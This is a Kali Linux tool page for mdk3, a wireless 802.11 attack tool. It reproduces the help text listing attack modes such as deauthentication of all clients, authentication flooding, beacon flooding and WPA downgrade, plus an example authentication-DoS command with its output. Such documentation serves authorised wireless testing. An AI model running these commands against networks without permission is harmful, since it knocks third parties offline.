kali工具箱

mdk3 Package Description

MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses. IMPORTANT: It is your responsibility to make sure you have permission from the network owner before running MDK against it.

mdk3 Homepage | Kali mdk3 Repo

Author: ASPj of k2wrlz
License: GPLv2

Tools included in the mdk3 package

mdk3 – Wireless attack tool for IEEE 802.11 networks

[email protected]:~# mdk3 --help



MDK 3.0 v6 - "Yeah, well, whatever"

by ASPj of k2wrlz, using the osdep library from aircrack-ng

And with lots of help from the great aircrack-ng community:

Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape,

telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik

THANK YOU!



MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.

IMPORTANT: It is your responsibility to make sure you have permission from the

network owner before running MDK against it.



This code is licenced under the GPLv2



MDK USAGE:

mdk3 <interface> <test_mode> [test_options]



Try mdk3 --fullhelp for all test options

Try mdk3 --help <test_mode> for info about one test only



TEST MODES:

b   - Beacon Flood Mode

      Sends beacon frames to show fake APs at clients.

      This can sometimes crash network scanners and even drivers!

a   - Authentication DoS mode

      Sends authentication frames to all APs found in range.

      Too much clients freeze or reset some APs.

p   - Basic probing and ESSID Bruteforce mode

      Probes AP and check for answer, useful for checking if SSID has

      been correctly decloaked or if AP is in your adaptors sending range

      SSID Bruteforcing is also possible with this test mode.

d   - Deauthentication / Disassociation Amok Mode

      Kicks everybody found from AP

m   - Michael shutdown exploitation (TKIP)

      Cancels all traffic continuously

x   - 802.1X tests

w   - WIDS/WIPS Confusion

      Confuse/Abuse Intrusion Detection and Prevention Systems

f   - MAC filter bruteforce mode

      This test uses a list of known client MAC Adresses and tries to

      authenticate them to the given AP while dynamically changing

      its response timeout for best performance. It currently works only

      on APs who deny an open authentication request properly

g   - WPA Downgrade test

      deauthenticates Stations and APs sending WPA encrypted packets.

      With this test you can check if the sysadmin will try setting his

      network to WEP or disable encryption.

mdk3 Usage Example

Use the wireless interface (wlan0) to run the Authentication DoS mode test (a):

[email protected]:~# mdk3 wlan0 a



Trying to get a new target AP...                  

AP 9C:D3:6D:B8:FF:56 is responding!           

Connecting Client: 00:00:00:00:00:00 to target AP: 9C:D3:6D:B8:FF:56

Connecting Client: 00:00:00:00:00:00 to target AP: 9C:D3:6D:B8:FF:56

AP 9C:D3:6D:B8:FF:56 seems to be INVULNERABLE!      

Device is still responding with   500 clients connected!

Trying to get a new target AP...                  

AP E0:3F:49:6A:57:78 is responding!           

Connecting Client: 00:00:00:00:00:00 to target AP: E0:3F:49:6A:57:78

AP E0:3F:49:6A:57:78 seems to be INVULNERABLE!